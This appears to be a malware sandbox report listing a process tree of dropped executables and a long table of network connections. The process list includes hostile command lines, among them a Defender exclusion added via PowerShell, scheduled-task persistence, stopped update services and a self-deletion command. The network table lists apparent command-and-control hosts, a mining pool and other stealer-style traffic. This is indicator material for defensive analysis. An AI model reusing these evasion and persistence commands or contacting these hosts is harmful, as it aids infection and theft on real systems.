C:\ProgramData\axaso\bkujn.exe
C:\ProgramData\axaso\bkujn.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\ProgramData\axaso\bkujn.exe
"C:\ProgramData\axaso\bkujn.exe"
C:\Users\Admin\AppData\Local\Temp\Files\IadFRw%E2%80%AEfdp..exe
"C:\Users\Admin\AppData\Local\Temp\Files\IadFRw%E2%80%AEfdp..exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6184 -ip 6184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 440
C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"
C:\Users\Admin\AppData\Local\Temp\Files\shell.exe
"C:\Users\Admin\AppData\Local\Temp\Files\shell.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\BtnoWSiF.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 6884
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BtnoWSiF" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFF27.tmp"
C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe"
C:\Users\Admin\AppData\Local\Temp\is-NUNUV.tmp\ubi-inst.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NUNUV.tmp\ubi-inst.tmp" /SL5="$60412,922170,832512,C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6264 -ip 6264
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\ProgramData\axaso\bkujn.exe
C:\ProgramData\axaso\bkujn.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1336
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 308
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6884 -ip 6884
C:\ProgramData\axaso\bkujn.exe
"C:\ProgramData\axaso\bkujn.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5836 -ip 5836
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-IADQN.tmp\set.bat""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1432
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\ProgramData\hwnab\wjnasib.exe
C:\ProgramData\hwnab\wjnasib.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5696 -ip 5696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 444
C:\ProgramData\hwnab\wjnasib.exe
"C:\ProgramData\hwnab\wjnasib.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1340
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\ProgramData\hwnab\wjnasib.exe
C:\ProgramData\hwnab\wjnasib.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6556 -ip 6556
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 448
C:\ProgramData\hwnab\wjnasib.exe
"C:\ProgramData\hwnab\wjnasib.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2672 -ip 2672
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 1300
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| CN | 222.186.172.42:1000 | | tcp |
| NL | 89.110.69.103:80 | | tcp |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 8.8.8.8:53 | 33.177.156.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| DE | 212.113.107.84:80 | 212.113.107.84 | tcp |
| NL | 89.110.69.103:80 | | tcp |
| US | 8.8.8.8:53 | 84.107.113.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| US | 8.8.8.8:53 | home.sevkk17sr.top | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | AcDyjGxADzSolWB.AcDyjGxADzSolWB | udp |
| US | 8.8.8.8:53 | 72.23.230.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 104.21.45.165:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | cdn-downloads.com | udp |
| NL | 203.161.45.11:443 | cdn-downloads.com | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.45.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.45.161.203.in-addr.arpa | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.58.21.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.95.123.104.in-addr.arpa | udp |
| US | 104.21.45.165:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.195:3333 | pool.supportxmr.com | tcp |
| US | 8.8.8.8:53 | 195.96.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grupodulcemar.pe | udp |
| PE | 161.132.57.101:443 | grupodulcemar.pe | tcp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| US | 144.172.71.105:1338 | 144.172.71.105 | tcp |
| US | 8.8.8.8:53 | 105.71.172.144.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 144.172.71.105:1338 | 144.172.71.105 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | GDinpHlLXN.GDinpHlLXN | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 8.8.8.8:53 | download.innovare.no | udp |
| NO | 217.149.124.92:80 | download.innovare.no | tcp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| US | 8.8.8.8:53 | 92.124.149.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 208.242.5.163.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | berrylinyj.cyou | udp |
| US | 8.8.8.8:53 | worddosofrm.shop | udp |
| US | 8.8.8.8:53 | mutterissuen.shop | udp |
| US | 8.8.8.8:53 | standartedby.shop | udp |
| US | 8.8.8.8:53 | nightybinybz.shop | udp |
| US | 8.8.8.8:53 | conceszustyb.shop | udp |
| US | 8.8.8.8:53 | bakedstusteeb.shop | udp |
| US | 8.8.8.8:53 | respectabosiz.shop | udp |
| US | 8.8.8.8:53 | moutheventushz.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 254.238.217.23.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| RU | 185.215.113.66:5152 | twizt.net | tcp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 175.117.168.52.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | arteflordeliz.com.br | udp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| US | 108.179.252.235:80 | arteflordeliz.com.br | tcp |
| US | 8.8.8.8:53 | 82.235.72.20.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 235.252.179.108.in-addr.arpa | udp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| YE | 134.35.107.95:40500 | udp | |
| UZ | 90.156.164.103:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 217.30.160.219:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 2.133.136.145:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 151.241.234.162:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 90.156.163.98:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| IR | 93.119.67.90:40500 | udp | |
| TR | 85.103.235.188:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 213.211.105.70:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| SY | 95.212.120.220:40500 | udp | |
| NL | 89.110.69.103:80 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| IR | 89.219.192.32:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 31.171.187.236:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 82.200.169.186:40500 | udp | |
| TJ | 91.231.253.155:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 217.218.8.134:40500 | udp | |
| CN | 47.115.54.19:80 | tcp | |
| US | 8.8.8.8:53 | home.tventjo20vs.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.176.94.43:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| CN | 219.159.184.14:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| GT | 190.56.14.82:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| MX | 189.142.102.173:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 198.163.193.229:40500 | tcp | |
| TR | 85.103.235.188:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AO | 102.215.170.62:40500 | udp | |
| CN | 47.116.27.92:8081 | tcp | |
| US | 8.8.8.8:53 | 300snails.sbs | udp |
| US | 8.8.8.8:53 | thicktoys.sbs | udp |
| US | 8.8.8.8:53 | fleez-inc.sbs | udp |
| US | 8.8.8.8:53 | 3xc1aimbl0w.sbs | udp |
| US | 8.8.8.8:53 | bored-light.sbs | udp |
| US | 8.8.8.8:53 | faintbl0w.sbs | udp |
| US | 8.8.8.8:53 | crib-endanger.sbs | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 5.251.234.88:40500 | udp | |
| UZ | 213.230.126.169:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 93.188.83.239:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.190.224.152:40500 | tcp | |
| UZ | 90.156.160.10:40500 | udp | |
| US | 8.8.8.8:53 | dev.cyberark-igiwax.com | udp |
| US | 44.243.209.238:80 | dev.cyberark-igiwax.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 198.163.196.30:40500 | udp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 172.67.139.78:443 | drive-connect.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 192.210.150.26:8787 | tcp | |
| KR | 211.204.100.20:1234 | 211.204.100.20 | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| UZ | 90.156.161.73:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 5.251.95.166:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.185.189.167:40500 | udp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 178.206.158.183:40500 | tcp | |
| IR | 5.134.199.85:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 37.151.133.175:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.181.206.190:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 77.81.135.219:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| KR | 146.56.118.137:80 | 146.56.118.137 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| MX | 201.114.202.249:40500 | udp | |
| US | 8.8.8.8:53 | d.kpzip.com | udp |
| CN | 14.205.47.205:80 | d.kpzip.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| CI | 160.155.209.135:40500 | udp | |
| YE | 178.130.96.97:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AF | 149.54.20.134:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 151.241.114.78:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 198.163.193.229:40500 | udp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | ftp.ywxww.net | udp |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| IR | 2.176.72.136:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 84.54.71.94:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 93.188.86.253:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| EG | 45.241.38.203:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.177.40.206:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 123.ywxww.net | udp |
| IR | 5.232.126.125:40500 | udp | |
| CN | 60.191.208.187:820 | 123.ywxww.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 2.133.70.66:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| MX | 189.167.22.36:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 92.38.19.10:40500 | tcp | |
| MX | 189.135.23.235:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| N/A | 172.16.16.140:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| GH | 196.175.1.52:40500 | udp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| DE | 172.105.66.118:80 | 172.105.66.118 | tcp |
| NL | 185.180.196.46:80 | 185.180.196.46 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| RU | 188.124.116.191:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 151.233.61.190:40500 | tcp | |
| RU | 94.51.68.160:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 83.222.7.85:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| IR | 89.43.216.137:40500 | udp | |
| RU | 176.113.115.163:80 | 176.113.115.163 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| YE | 178.130.118.237:40500 | udp | |
| VN | 103.173.254.78:80 | 103.173.254.78 | tcp |
| CN | 111.231.145.137:8888 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| TJ | 95.142.87.201:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| SY | 77.44.192.46:40500 | udp | |
| KG | 212.112.107.11:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 95.59.33.46:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| SY | 82.100.175.13:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 91.122.218.118:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| BR | 147.45.116.5:80 | 147.45.116.5 | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| IR | 185.123.69.190:40500 | udp | |
| FR | 216.58.214.174:443 | google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 192.210.150.26:8787 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| HK | 134.122.129.18:80 | 134.122.129.18 | tcp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| SY | 77.44.162.69:40500 | udp | |
| IR | 5.232.120.72:40500 | tcp | |
| US | 8.8.8.8:53 | deauduafzgezzfgm.top | udp |
| RU | 185.215.113.66:80 | deauduafzgezzfgm.top | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| KZ | 92.47.230.214:40500 | udp | |
| US | 8.8.8.8:53 | aeufoeahfouefhg.top | udp |
| RU | 185.215.113.66:80 | aeufoeahfouefhg.top | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 16.15.176.226:443 | bbuseruploads.s3.amazonaws.com | tcp |
| IR | 2.176.112.82:40500 | udp | |
